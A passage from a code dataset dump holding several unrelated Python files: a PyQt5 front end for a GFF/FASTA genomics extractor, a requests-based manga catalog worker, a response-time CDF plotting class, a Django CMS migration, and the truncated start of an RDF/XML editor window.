main()\n","sub_path":"Deep_Model/naive_model_backup.py","file_name":"naive_model_backup.py","file_ext":"py","file_size_in_byte":13950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"579433487","text":"__author__ = 'milescsmith'\n__author_email__ = 'mileschristiansmith@gmail.com'\n\n# TODO: figure out how to use QThreads and move a lot of this into a thread so the GUI stays responsive and we can\n# cancel commands\n\nimport sys\nimport os\n\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\nimport GFFextractor\n\n# this is what GENCODE had listed for GFF3 biotypes as of May 2016:\nbiotypes = ['IG_C_gene','IG_D_gene','IG_J_gene','IG_LV_gene','IG_V_gene','TR_C_gene','TR_J_gene','TR_V_gene',\n 'TR_D_gene','IG_C_pseudogene','IG_J_pseudogene','IG_V_pseudogene','TR_V_pseudogene','TR_J_pseudogene',\n 'Mt_tRNA','miRNA','misc_RNA','rRNA','scRNA','snRNA','snoRNA','ribozyme','sRNA','scaRNA','tRNA_pseudogene',\n 'snoRNA_pseudogene','snRNA_pseudogene','scRNA_pseudogene','rRNA_pseudogene','misc_RNA_pseudogene',\n 'miRNA_pseudogene','TEC','nonsense_mediated_decay','non_stop_decay','retained_intron','protein_coding',\n 'processed_transcript','non-coding','ambiguous_orf','sense_overlapping','antisense','known_ncrna',\n 'pseudogene','processed_pseudogene','polymorphic_pseudogene','retrotransposed',\n 'transcribed_processed_pseudogene','transcribed_unprocessed_pseudogene','transcribed_unitary_pseudogene',\n 'translated_unprocessed_pseudogene','unitary_pseudogene','unprocessed_pseudogene','artifact','lincRNA',\n 'macro_lncRNA','LRG_gene','3prime_overlapping_ncRNA','disrupted_domain','vaultRNA',\n 'bidirectional_promoter_lncRNA']\n\nclass dropLineEdit(QLineEdit):\n def __init__(self, title):\n super(dropLineEdit, self).__init__(title)\n self.setAcceptDrops(True)\n\n def dragEnterEvent(self, e):\n if e.mimeData().hasUrls():\n e.accept()\n else:\n e.ignore()\n\n def dropEvent(self, e):\n for url in e.mimeData().urls():\n path = url.toLocalFile()\n # if os.path.isfile(path):\n self.setText(path)\n\n\nclass MainWindow(QWidget):\n def __init__(self):\n super(MainWindow, self).__init__()\n\n self.initUI()\n\n def initUI(self):\n # setup default arguments to pass GFFExtractor.extract to make things easier when calling\n self.gfffile = None\n self.fastafile = None\n self.outputfile = None\n self.biotype = None\n self.ebiotype = None\n self.feature_type = []\n self.gene_name = None\n self.gene_file_name = None\n self.geneIDs = None\n self.geneIDs_file = None\n self.bound = 0\n self.non_ensembl = False\n self.genelist = False\n self.nonGFF = None\n self.tss = []\n\n # create widgets to select the GFF, Fasta, and output files\n make_rocket_go_now = QPushButton('Run GFFExtractor!', self)\n make_rocket_go_now.clicked.connect(self.callGFFextractor)\n files_fbox = QFormLayout()\n files_gbox = QGroupBox('Select files:')\n options_grbox = QGridLayout()\n options_gbox = QGroupBox('Select options:')\n outervbox = QVBoxLayout()\n\n t_hbox = QHBoxLayout()\n b_hbox = QHBoxLayout()\n br_vbox = QVBoxLayout()\n bm_vbox = QVBoxLayout()\n bl_vbox = QVBoxLayout()\n\n self.GFFbtn = QPushButton('Select GFF file', self)\n self.GFFbtn.setFixedWidth(140)\n self.GFFLe = dropLineEdit(self)\n self.GFFLe.setMinimumWidth(400)\n self.GFFLe.setToolTip('Enter the path to and the name of the GFF file or drag the file into this box')\n\n self.Fastabtn = QPushButton('Select Fasta file', self)\n self.Fastabtn.setFixedWidth(140)\n self.FastaLe = dropLineEdit(self)\n self.FastaLe.setMinimumWidth(400)\n self.FastaLe.setToolTip('Enter the path to and the name of the Fasta file or drag the file into this box')\n\n self.Outputbtn = QPushButton('Select Output file', self)\n self.Outputbtn.setFixedWidth(140)\n self.OutputLe = dropLineEdit(self)\n self.OutputLe.setMinimumWidth(400)\n self.OutputLe.setToolTip('Enter the path to and the name of the Output file')\n\n files_fbox.addRow(self.GFFbtn, self.GFFLe)\n files_fbox.addRow(self.Fastabtn, self.FastaLe)\n files_fbox.addRow(self.Outputbtn, self.OutputLe)\n files_gbox.setLayout(files_fbox)\n\n # create widgets for the optional parameters\n self.NEcb = QCheckBox('Non-ensembl source', self)\n self.nonGFFcb = QCheckBox('non-GFF3 file', self)\n self.boundcb = QCheckBox('Use gene boundary', self)\n self.boundcb.stateChanged.connect(self.enableWidgets)\n self.boundlengthsb = QSpinBox(self)\n self.boundlengthsb.setMaximum(999999)\n self.boundlengthsb.setEnabled(False)\n self.tsscb = QCheckBox('Use transcription start site', self)\n self.tsscb.stateChanged.connect(self.enableWidgets)\n self.uppertsssb = QSpinBox(self)\n self.uppertsssb.isAccelerated()\n self.uppertsslabel = QLabel(\"nt upstream\")\n self.uppertsssb.setRange(-99999,99999)\n self.uppertsssb.setEnabled(False)\n self.lowertsssb = QSpinBox(self)\n self.lowertsslabel = QLabel(\"nt downstream\")\n self.lowertsssb.isAccelerated()\n self.lowertsssb.setRange(-99999,99999)\n self.lowertsssb.setEnabled(False)\n\n # create biotype area\n self.BioTypeChk = QCheckBox('Restrict to selected biotype(s):',\n self) # need to make everything below enable/disable on check\n self.BioTypeListWidget = QListWidget(self)\n self.BioTypeListWidget.setSelectionMode(3)\n self.BioTypeListWidget.sortItems()\n self.BioTypeBuildbtn = QPushButton('Enter biotype')\n self.ExBioTypeChk = QCheckBox('Exclude selected biotype(s):', self)\n self.ExBioTypeListWidget = QListWidget(self)\n self.ExBioTypeListWidget.setSelectionMode(3)\n\n for x in biotypes:\n QListWidgetItem(x,self.BioTypeListWidget)\n QListWidgetItem(x,self.ExBioTypeListWidget)\n\n self.BioTypeBuildbtn.setEnabled(False)\n self.BioTypeListWidget.setEnabled(False)\n self.ExBioTypeListWidget.setEnabled(False)\n\n self.BioTypeChk.stateChanged.connect(self.enableWidgets)\n self.ExBioTypeChk.stateChanged.connect(self.enableWidgets)\n self.BioTypeBuildbtn.clicked.connect(self.manualBiotype)\n\n # create the featuretype area\n self.featureTypeChk = QCheckBox('Restrict to selected feature(s):',\n self) # need to make everything below enable/disable on check\n self.featureTypeListWidget = QListWidget(self)\n self.featureTypeListWidget.setSelectionMode(3)\n self.featureTypeBuildbtn = QPushButton('Scan for features')\n self.featureTypeBuildbtn.clicked.connect(self.callGFFextractor)\n self.featureManualEntryBtn = QPushButton('Manually enter a feature type')\n self.featureManualEntryBtn.setEnabled(False)\n self.featureManualEntryBtn.clicked.connect(self.manualFeatureName)\n self.featureClearBtn = QPushButton('Clear features')\n self.featureClearBtn.setEnabled(False)\n self.featureClearBtn.clicked.connect(self.featureTypeListWidget.clear)\n # self.ExfeatureTypeChk = QCheckBox('Exclude selected feature(s):', self)\n # self.ExfeatureTypeListWidget = QListWidget(self)\n # self.ExfeatureTypeListWidget.setSelectionMode(3)\n\n self.featureTypeListWidget.setEnabled(False)\n self.featureTypeBuildbtn.setEnabled(False)\n # self.ExfeatureTypeListWidget.setEnabled(False)\n\n self.featureTypeChk.stateChanged.connect(self.enableWidgets)\n # self.ExfeatureTypeChk.stateChanged.connect(self.enableWidgets)\n self.featureTypeBuildbtn.clicked.connect(self.callGFFextractor)\n\n # create the nametype area\n self.nameChk = QCheckBox('Restrict to selected name(s):',\n self) # need to make everything below enable/disable on check\n self.nameListWidget = QListWidget(self)\n self.nameListWidget.setSelectionMode(3)\n self.nameListWidget.setSortingEnabled(True)\n self.nameBuildbtn = QPushButton('Scan for names')\n self.nameBuildbtn.clicked.connect(self.callGFFextractor)\n self.nameManualbtn = QPushButton('Manually enter a gene')\n self.nameManualbtn.clicked.connect(self.manualGeneName)\n self.nameLoadFromFile = QPushButton('Load gene list from file')\n self.nameLoadFromFile.clicked.connect(self.loadGeneNameFromFile)\n self.nameSaveToFileBtn = QPushButton('Save gene names to file')\n self.nameSaveToFileBtn.clicked.connect(self.saveGeneNamesToFile)\n self.nameClearWidget = QPushButton('Clear gene names')\n self.nameClearWidget.clicked.connect(self.nameListWidget.clear)\n\n self.nameClearWidget.setEnabled(False)\n self.nameLoadFromFile.setEnabled(False)\n self.nameListWidget.setEnabled(False)\n self.nameBuildbtn.setEnabled(False)\n self.nameManualbtn.setEnabled(False)\n self.nameSaveToFileBtn.setEnabled(False)\n self.nameChk.stateChanged.connect(self.enableWidgets)\n\n self.GFFbtn.clicked.connect(self.selectFile)\n self.Fastabtn.clicked.connect(self.selectFile)\n self.Outputbtn.clicked.connect(self.selectFile)\n\n br_vbox.addWidget(self.BioTypeChk)\n br_vbox.addWidget(self.BioTypeBuildbtn)\n br_vbox.addWidget(self.BioTypeListWidget)\n br_vbox.addWidget(self.ExBioTypeChk)\n br_vbox.addWidget(self.ExBioTypeListWidget)\n\n bm_vbox.addWidget(self.featureTypeChk)\n bm_vbox.addWidget(self.featureTypeBuildbtn)\n bm_vbox.addWidget(self.featureManualEntryBtn)\n bm_vbox.addWidget(self.featureClearBtn)\n bm_vbox.addWidget(self.featureTypeListWidget)\n # bm_vbox.addWidget(self.ExfeatureTypeChk)\n # bm_vbox.addWidget(self.ExfeatureTypeListWidget)\n\n bl_vbox.addWidget(self.nameChk)\n bl_vbox.addWidget(self.nameBuildbtn)\n bl_vbox.addWidget(self.nameLoadFromFile)\n bl_vbox.addWidget(self.nameClearWidget)\n bl_vbox.addWidget(self.nameManualbtn)\n bl_vbox.addWidget(self.nameListWidget)\n bl_vbox.addWidget(self.nameSaveToFileBtn)\n\n b_hbox.addLayout(bl_vbox)\n b_hbox.addLayout(bm_vbox)\n b_hbox.addLayout(br_vbox)\n\n options_grbox.setColumnMinimumWidth(1, 100)\n options_grbox.setColumnMinimumWidth(2, 100)\n options_grbox.addWidget(self.NEcb, 0, 0)\n options_grbox.addWidget(self.nonGFFcb, 0, 1)\n options_grbox.addWidget(self.boundcb, 1, 0)\n options_grbox.addWidget(self.boundlengthsb, 1, 1)\n\n options_grbox.addWidget(self.tsscb, 3, 0)\n options_grbox.addWidget(self.uppertsslabel, 2, 1)\n options_grbox.addWidget(self.uppertsssb, 3, 1)\n options_grbox.addWidget(self.lowertsslabel, 2, 2)\n options_grbox.addWidget(self.lowertsssb, 3, 2)\n options_gbox.setLayout(options_grbox)\n\n t_hbox.addWidget(files_gbox)\n t_hbox.addWidget(options_gbox)\n\n outervbox.addLayout(t_hbox)\n outervbox.addLayout(b_hbox)\n outervbox.addWidget(make_rocket_go_now)\n self.setLayout(outervbox)\n\n self.setGeometry(300, 300, 1000, 750)\n self.setWindowTitle('GFFExtractor')\n self.show()\n\n @pyqtSlot()\n def selectFile(self):\n source = self.sender()\n\n if 'GFF' in source.text():\n fileName = QFileDialog.getOpenFileName(self)\n self.GFFLe.setText(fileName[0])\n elif 'Fasta' in source.text():\n fileName = QFileDialog.getOpenFileName(self)\n self.FastaLe.setText(fileName[0])\n elif 'Output' in source.text():\n fileName = QFileDialog.getSaveFileName(self)\n self.OutputLe.setText(fileName[0])\n\n @pyqtSlot()\n def enableWidgets(self):\n source = self.sender()\n\n if \"Restrict to selected biotype(s)\" in source.text():\n if source.isChecked():\n self.BioTypeListWidget.setEnabled(True)\n self.BioTypeBuildbtn.setEnabled(True)\n elif not source.isChecked():\n self.BioTypeListWidget.setEnabled(False)\n if not self.ExBioTypeChk.isChecked():\n self.BioTypeBuildbtn.setEnabled(False)\n\n if \"Exclude selected biotype(s)\" in source.text():\n if source.isChecked():\n self.ExBioTypeListWidget.setEnabled(True)\n self.BioTypeBuildbtn.setEnabled(True)\n elif not source.isChecked():\n self.ExBioTypeListWidget.setEnabled(False)\n if not self.BioTypeChk.isChecked():\n self.BioTypeBuildbtn.setEnabled(False)\n\n if \"Restrict to selected feature(s)\" in source.text():\n if source.isChecked():\n self.featureTypeListWidget.setEnabled(True)\n self.featureTypeBuildbtn.setEnabled(True)\n self.featureManualEntryBtn.setEnabled(True)\n elif not source.isChecked():\n self.featureTypeBuildbtn.setEnabled(False)\n self.featureTypeListWidget.setEnabled(False)\n self.featureManualEntryBtn.setEnabled(False)\n # if not self.ExfeatureTypeChk.isChecked():\n # self.featureTypeBuildbtn.setEnabled(False)\n\n # if \"Exclude selected feature(s)\" in source.text():\n # if source.isChecked():\n # self.ExfeatureTypeListWidget.setEnabled(True)\n # self.featureTypeBuildbtn.setEnabled(True)\n # elif not source.isChecked():\n # self.ExfeatureTypeListWidget.setEnabled(False)\n # if not self.featureTypeChk.isChecked():\n # self.featureTypeBuildbtn.setEnabled(False)\n\n if \"Restrict to selected name(s)\" in source.text():\n if source.isChecked():\n self.nameListWidget.setEnabled(True)\n self.nameBuildbtn.setEnabled(True)\n self.nameManualbtn.setEnabled(True)\n self.nameLoadFromFile.setEnabled(True)\n elif not source.isChecked():\n self.nameListWidget.setEnabled(False)\n self.nameBuildbtn.setEnabled(False)\n self.nameManualbtn.setEnabled(False)\n self.nameLoadFromFile.setEnabled(False)\n\n if \"Use gene boundary\" in source.text():\n if source.isChecked():\n self.boundlengthsb.setEnabled(True)\n else:\n self.boundlengthsb.setEnabled(False)\n\n if \"Use transcription\" in source.text():\n if source.isChecked():\n self.lowertsssb.setEnabled(True)\n self.uppertsssb.setEnabled(True)\n else:\n self.lowertsssb.setEnabled(False)\n self.uppertsssb.setEnabled(False)\n\n @pyqtSlot()\n def manualBiotype(self):\n manualName, ok = QInputDialog.getText(self, 'Manual entry', 'Enter a biotype:')\n if ok:\n QListWidgetItem(manualName, self.BioTypeListWidget)\n QListWidgetItem(manualName, self.ExBioTypeListWidget)\n\n @pyqtSlot()\n def callGFFextractor(self):\n source = self.sender()\n\n if 'features' in source.text():\n self.featureTypeListWidget.clear()\n # self.ExfeatureTypeListWidget.clear()\n Features = GFFextractor.show_features(self.GFFLe.text())\n for x in Features:\n QListWidgetItem(x,self.featureTypeListWidget)\n self.featureTypeListWidget.setSortingEnabled(True)\n self.featureTypeListWidget.sortItems()\n self.featureClearBtn.setEnabled(True)\n elif 'name' in source.text():\n if self.NEcb.isChecked():\n self.nonensembl = True\n elif not self.NEcb.isChecked():\n self.nonensembl = False\n GeneNames = GFFextractor.show_genes(self.GFFLe.text(), self.nonensembl)\n for x in GeneNames:\n QListWidgetItem(x, self.nameListWidget)\n self.nameClearWidget.setEnabled(True)\n self.nameSaveToFileBtn.setEnabled(True)\n elif 'Run GFFExtractor!' in source.text():\n if self.GFFLe.text() == '':\n QMessageBox.warning(self,'No GFF file set','Please select a GFF file.')\n elif self.FastaLe.text() == '':\n QMessageBox.warning(self, 'No Fasta file set', 'Please select a Fasta file.')\n elif self.OutputLe.text() == '':\n QMessageBox.warning(self,'No Output set','Please select a file to write to.')\n else:\n if self.nameChk.isChecked(): self.genename = [str(x.text()) for x in\n self.nameListWidget.selectedItems()]\n if self.featureTypeChk.isChecked(): self.feature_type = [str(y.text()) for y in\n self.featureTypeListWidget.selectedItems()]\n if self.NEcb.isChecked(): self.non_ensembl = True\n if (int(self.boundlengthsb.text()) > 0) and self.boundcb.isChecked():\n bound = int(self.boundlengthsb.text())\n self.biotype = [str(x.text()) for x in self.BioTypeListWidget.selectedItems()]\n self.ebiotype = [str(x.text()) for x in self.ExBioTypeListWidget.selectedItems()]\n if self.tsscb.isChecked():\n if (self.uppertsssb.text() and self.lowertsssb.text()):\n self.tss = [int(self.uppertsssb.text()), int(self.lowertsssb.text())]\n print(\"Cutting from {} to {} relative to the tss\".format(self.tss[0],self.tss[1]))\n else:\n QMessageBox.warning(\"No tss values set\", \"Please make sure that both an upstream and downstream \"\n \"value is set for the tss boundary\")\n pass\n\n result = GFFextractor.extract(gfffile=self.GFFLe.text(), fastafile=self.FastaLe.text(),\n feature_type=self.feature_type, outfile=self.OutputLe.text(), gene_name=self.genename,\n non_ensembl=self.non_ensembl, boundary=self.bound, bio=self.biotype, exbio=self.ebiotype,\n geneIDs=None, genelist=False, tss=self.tss, window=self)\n if result == 'oops':\n QMessageBox.warning(self,'GFFextractor error','Looks like GFFextractor had a problem. Please see '\n 'the console for more info.')\n else:\n QMessageBox.warning(self,'GFFextractor finished','Job done!')\n\n @pyqtSlot()\n def manualGeneName(self):\n manualName, ok = QInputDialog.getText(self, 'Manual entry', 'Enter a gene name:')\n if ok:\n QListWidgetItem(manualName, self.nameListWidget)\n self.nameSaveToFileBtn.setEnabled(True)\n self.nameClearWidget.setEnabled(True)\n\n @pyqtSlot()\n def manualFeatureName(self):\n manualFeature, ok = QInputDialog.getText(self, 'Manual entry', 'Enter a feature type:')\n if ok:\n QListWidgetItem(manualFeature, self.featureTypeListWidget)\n self.featureClearBtn.setEnabled(True)\n\n @pyqtSlot()\n def loadGeneNameFromFile(self):\n genefile = QFileDialog.getOpenFileName(self)\n if genefile[0]:\n with open(genefile[0],'rU') as f:\n names = [name for name in f.readlines()]\n for x in names:\n QListWidgetItem(x.strip('\\r\\n'),self.nameListWidget)\n self.nameSaveToFileBtn.setEnabled(True)\n self.nameClearWidget.setEnabled(True)\n\n @pyqtSlot()\n def saveGeneNamesToFile(self):\n fileName = QFileDialog.getSaveFileName(self)\n lst = [i.text() for i in self.nameListWidget.findItems(\"\", Qt.MatchContains)]\n with open(fileName[0], 'w') as of:\n for x in lst:\n of.writelines(str(x) + '\\n')\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n ex = MainWindow()\n sys.exit(app.exec_())\n","sub_path":"GFEwindow.py","file_name":"GFEwindow.py","file_ext":"py","file_size_in_byte":20326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"119492061","text":"import logging\nfrom collections import namedtuple\n\nimport requests\n\nlogging.basicConfig(\n level=logging.DEBUG,\n format=' %(asctime)s - %(levelname)s - %(message)s'\n)\n\nManga = namedtuple('Manga', ['url', 'title', 'is_complete'])\n\nclass GenericWorker:\n session = requests.session()\n\n def get_response(self, method, url, **kwargs):\n try:\n response = self.session.request(method, url, **kwargs)\n response.raise_for_status()\n except requests.exceptions.HTTPError as err:\n logging.critical('An error happened during the request')\n else:\n return response\n\n return None\n\n @staticmethod\n def manga_factory(url, title, is_complete):\n manga = Manga(url, title, is_complete)\n return manga\n\n def get_manga_list(self, save=False):\n\n response = self.get_catalog()\n\n mangas = self.parse_catalog(response)\n\n if save:\n mangas = self.save_mangas(mangas)\n\n return mangas\n\n def get_catalog(self):\n raise NotImplementedError('This method must be implemented')\n\n def parse_catalog(self, response):\n raise NotImplementedError('This method must be implemented')\n\n def save_mangas(self, mangas):\n raise NotImplementedError('This method must be implemented')\n","sub_path":"workers/generic_worker.py","file_name":"generic_worker.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"3629421","text":"import os\nimport collections\n\nimport pandas as pd\nimport numpy as np\n\nfrom matplotlib import pyplot as plt\n\nimport stethoscope.plotting_constants as plotting_constants\n\nclass ResponseTimesCDF:\n\n FILENAME = 'cdf_response_times.png'\n\n @classmethod\n def comparative_plot_normalized(cls: type, simulations_by_name : dict, simulation_step : pd.Timedelta, figures_dir : str = None, names_converter = None):\n\n fulfilled_cnt_regionalized = collections.defaultdict(lambda: collections.defaultdict(lambda: collections.defaultdict(int)))\n for simulation_name, simulation_instances in simulations_by_name.items():\n for simulation in simulation_instances:\n for region_name, response_times_per_request_type in simulation.response_times.items():\n for req_type, response_times in response_times_per_request_type.items():\n fulfilled_cnt_regionalized[region_name][req_type][simulation_name] += len(response_times)\n\n fulfilled_cnt_regionalized_maximums = collections.defaultdict(lambda: collections.defaultdict(int))\n for region_name, fulfilled_cnt_per_request_type in fulfilled_cnt_regionalized.items():\n for req_type, fulfilled_cnt_per_simulation in fulfilled_cnt_per_request_type.items():\n fulfilled_cnt_regionalized_maximums[region_name][req_type] = max(fulfilled_cnt_per_simulation.values())\n\n normalization_coefs = collections.defaultdict(lambda: collections.defaultdict(lambda: collections.defaultdict(float)))\n for region_name, fulfilled_cnt_per_request_type in fulfilled_cnt_regionalized.items():\n for req_type, fulfilled_cnt_per_simulation in fulfilled_cnt_per_request_type.items():\n for sim_name, fulfilled_cnt in fulfilled_cnt_per_simulation.items():\n normalization_coefs[sim_name][region_name][req_type] = fulfilled_cnt / fulfilled_cnt_regionalized_maximums[region_name][req_type]\n\n cls.comparative_plot(simulations_by_name, simulation_step, figures_dir, names_converter, normalization_coefs)\n\n @classmethod\n def comparative_plot(cls: type, simulations_by_name : dict, simulation_step : pd.Timedelta, figures_dir : str = None, names_converter = None, normalization_coefs = None):\n\n regions = list()\n response_times_regionalized_aggregated = collections.defaultdict(lambda: collections.defaultdict(lambda: collections.defaultdict(list)))\n for simulation_name, simulation_instances in simulations_by_name.items():\n\n for simulation in simulation_instances:\n for region_name, response_times_per_request_type in simulation.response_times.items():\n for req_type, response_times in response_times_per_request_type.items():\n response_times_regionalized_aggregated[simulation_name][region_name][req_type].extend(response_times)\n\n regions.append(region_name)\n\n for region_name in regions:\n fig = plt.figure()\n ax = fig.add_subplot(1, 1, 1)\n\n for simulation_name, response_times_regionalized_per_sim in response_times_regionalized_aggregated.items():\n simulation_name_as_label = names_converter(simulation_name)\n normalization_coef = normalization_coefs[simulation_name][region_name] if not normalization_coefs is None else None\n cls._internal_plot(ax, response_times_regionalized_per_sim[region_name], simulation_step, simulation_name_as_label, normalization_coef)\n\n cls._internal_post_processing(ax, region_name, figures_dir, len(response_times_regionalized_aggregated), normalization_coefs)\n\n @classmethod\n def plot(cls : type, response_times_regionalized : dict, simulation_step : pd.Timedelta, figures_dir : str = None):\n\n for region_name, response_times_per_request_type in response_times_regionalized.items():\n fig = plt.figure()\n ax = fig.add_subplot(1, 1, 1)\n cls._internal_plot(ax, response_times_per_request_type, simulation_step)\n cls._internal_post_processing(ax, region_name, figures_dir)\n\n @classmethod\n def _internal_plot(cls : type, ax, response_times_per_request_type : dict, simulation_step : pd.Timedelta, additional_label : str = None, normalization_coef : dict = None):\n\n present_request_types_cnt = len([ True for resp_times in response_times_per_request_type.values() if len(resp_times) > 0 ])\n\n if present_request_types_cnt > 0:\n simulation_step_ms = simulation_step.microseconds // 1000\n max_response_times_by_req_type = [max(response_times_of_req) for response_times_of_req in response_times_per_request_type.values() if len(response_times_of_req) > 0 ]\n max_response_time = max(max_response_times_by_req_type) if len(max_response_times_by_req_type) > 0 else 0\n cdf_xlim = int(max_response_time + simulation_step_ms)\n x_axis_step = max(simulation_step_ms, cdf_xlim // 100)\n x_axis = range(0, cdf_xlim, x_axis_step)\n\n cdfs_per_req_type = {}\n for req_type, response_times in response_times_per_request_type.items():\n reqs_count_binned = [0] * len(x_axis)\n\n for response_time in response_times:\n reqs_count_binned[int(response_time // x_axis_step)] += 1\n\n cdfs_per_req_type[req_type] = np.cumsum(reqs_count_binned) / sum(reqs_count_binned)\n if not normalization_coef is None:\n cdfs_per_req_type[req_type] *= normalization_coef[req_type]\n\n for req_type, cdf_vals in cdfs_per_req_type.items():\n lbl = f'{additional_label}:\\n{req_type}' if not additional_label is None else req_type\n ax.plot(x_axis, cdf_vals, label = lbl)\n\n @classmethod\n def _internal_post_processing(cls : type, ax, region_name : str, figures_dir : str = None, ncol : int = 1, normalization_coefs : dict = None):\n\n percentiles = [0.99, 0.95, 0.90, 0.80, 0.50]\n font = {'color': 'black', 'weight': 'normal', 'size': 8}\n for percentile in percentiles:\n ax.axhline(percentile, 0, 1.0, color = 'k', linestyle = 'dashed', lw = 0.5)\n ax.text(0, percentile + 0.002, f\"{(int(percentile * 100))}th percentile\", fontdict = font)\n\n plt.xlabel('Response time, ms')\n plt.legend(loc = 'upper center', ncol = min(ncol, 2), bbox_to_anchor = (0.5, -0.15))\n\n if not figures_dir is None:\n fname = plotting_constants.filename_format.format(region_name, cls.FILENAME)\n if not normalization_coefs is None:\n fname = f'normalized-{fname}'\n figure_path = os.path.join(figures_dir, fname)\n plt.savefig(figure_path, dpi = plotting_constants.PUBLISHING_DPI, bbox_inches='tight')\n else:\n plt.title(f'CDF of requests by response time in region {region_name}')\n plt.show()\n\n plt.close()\n","sub_path":"stethoscope/autoscaling_quality/response_times_cdf.py","file_name":"response_times_cdf.py","file_ext":"py","file_size_in_byte":7006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"200364803","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nfrom decimal import Decimal\nimport django.core.validators\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('content', '0002_auto_20151112_1449'),\n ('cms', '0012_auto_20150607_2207'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='ProductPlugin',\n fields=[\n ('cmsplugin_ptr', models.OneToOneField(to='cms.CMSPlugin', serialize=False, parent_link=True, primary_key=True, auto_created=True)),\n ('link', models.URLField(null=True, blank=True, verbose_name='Link')),\n ('image', models.ImageField(null=True, upload_to='', blank=True, verbose_name='Image')),\n ('image_overlay', models.ImageField(null=True, upload_to='', blank=True, verbose_name='Image overlay')),\n ('price', models.DecimalField(validators=[django.core.validators.MinValueValidator(Decimal('0.01'))], verbose_name='Price', null=True, decimal_places=2, max_digits=10, blank=True)),\n ('from_price', models.DecimalField(validators=[django.core.validators.MinValueValidator(Decimal('0.01'))], verbose_name='From price', null=True, decimal_places=2, max_digits=10, blank=True)),\n ('template', models.CharField(max_length=255, choices=[('product_plugin/image_on_left.html', 'Image on left'), ('product_plugin/image_on_right.html', 'Image on right')], verbose_name='Template')),\n ('button_text', models.ForeignKey(verbose_name='Button text', null=True, blank=True, related_name='product_button_texts', to='content.Content')),\n ('content', models.ForeignKey(verbose_name='Text', null=True, blank=True, to='content.Content')),\n ('pre_title', models.ForeignKey(verbose_name='Pre title', null=True, blank=True, related_name='pretitles', to='content.Content')),\n ('sub_title', models.ForeignKey(verbose_name='Subtitle', null=True, blank=True, related_name='subtitles', to='content.Content')),\n ('title', models.ForeignKey(verbose_name='Title', null=True, blank=True, related_name='product_titles', to='content.Content')),\n ],\n options={\n 'abstract': False,\n },\n bases=('cms.cmsplugin',),\n ),\n ]\n","sub_path":"product_plugin/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"354091538","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon May 14 13:50:31 2018\n\n@author: z003umpb\n\"\"\"\nimport tempfile\nimport os\n\nfrom PyQt5.QtCore import QFile,\\\n QFileInfo,\\\n QTextStream,\\\n Qt,\\\n pyqtSignal\n\nfrom PyQt5.QtGui import QIcon\n \nfrom PyQt5.QtWidgets import QApplication,\\\n QFileDialog,\\\n QMessageBox\n\nfrom rdfxmleditor import RDFXmlEditor, RDFXmlTemplateEditor\nfrom rdfnavigatorxmldata import RDFNavigatorXmlSchema\nfrom rdfnavigatorthreads import RDFNavigatorTransformThread\n\n\nclass RDFNavigatorChildrenTypes(object):\n RDF, XML, SCHEMA, TEMPLATE = range(0, 4)\n\n\nclass RDFNavigatorChildBase(object):\n\n bookmark_added = pyqtSignal(str, int, str)\n bookmark_deleted = pyqtSignal(str, int, str)\n\n def newFile(self):\n pass\n\n def loadFile(self, fileName):\n pass\n\n def setManager(self, manager):\n self.manager = manager\n\n def save(self):\n if self.isUntitled:\n return self.saveAs()\n else:\n return self.saveFile(self.curFile)\n\n def saveAs(self):\n fileName, _ = QFileDialog.getSaveFileName(self, \"Save As\", self.curFile)\n if not fileName:\n return False\n\n return self.saveFile(fileName)\n\n def saveFile(self, fileName):\n return True\n\n def userFriendlyCurrentFile(self):\n return self.strippedName(self.curFile)\n\n def currentFile(self):\n return self.curFile\n\n def closeEvent(self, event):\n if self.maybeSave():\n event.accept()\n else:\n event.ignore()\n\n def documentWasModified(self):\n self.setWindowModified(self.isModified())\n\n def maybeSave(self):\n if self.isModified():\n ret = QMessageBox.warning(self, \"RDF Navigator\", \"'%s' has been modified.\\nDo you want to save your changes?\" % self.userFriendlyCurrentFile(), QMessageBox.Save | QMessageBox.Discard | QMessageBox.Cancel)\n if ret == QMessageBox.Save:\n return self.save()\n if ret == QMessageBox.Cancel:\n return False\n return True\n\n def setCurrentFile(self, fileName):\n self.curFile = QFileInfo(fileName).canonicalFilePath()\n self.isUntitled = False\n self.setModified(False)\n self.setWindowModified(False)\n self.setWindowTitle(self.userFriendlyCurrentFile() + \"[*]\")\n\n def strippedName(self, fullFileName):\n return QFileInfo(fullFileName).fileName()\n\n\nclass RDFNavigatorXmlChild(RDFXmlEditor, RDFNavigatorChildBase):\n sequenceNumber = 1\n output_message = pyqtSignal(str)\n\n def __init__(self, parent=None):\n super(RDFNavigatorXmlChild, self).__init__(parent)\n self.setAttribute(Qt.WA_DeleteOnClose)\n self.setWindowIcon(QIcon(':/images/xml.png'))\n self.isUntitled = True\n self.isRdf = False\n self.isSchema = False\n self.parent = parent\n self.marker_added.connect(self.createBookmark)\n self.marker_deleted.connect(self.deleteBookmark)\n\n def newFile(self):\n self.isUntitled = True\n self.curFile = \"document%d.xml\" % RDFNavigatorXmlChild.sequenceNumber\n RDFNavigatorXmlChild.sequenceNumber += 1\n self.setWindowTitle(self.curFile + '[*]')\n self.textChanged.connect(self.documentWasModified)\n\n def loadFile(self, fileName):\n if fileName.endswith('.xml'):\n self.isRdf = False\n self.loadXml(fileName)\n elif fileName.endswith('.rdf'):\n self.isRdf = True\n self.loadRdf(fileName)\n elif fileName.endswith('.xsd'):\n self.isRdf = False\n self.loadXsd(fileName)\n return True\n\n def saveFile(self, fileName):\n if self.isRdf:\n self.saveRdf(fileName)\n else:\n self.saveXml(fileName)\n return True\n\n def loadXml(self, fileName):\n file = QFile(fileName)\n if not file.open(QFile.ReadOnly | QFile.Text):\n 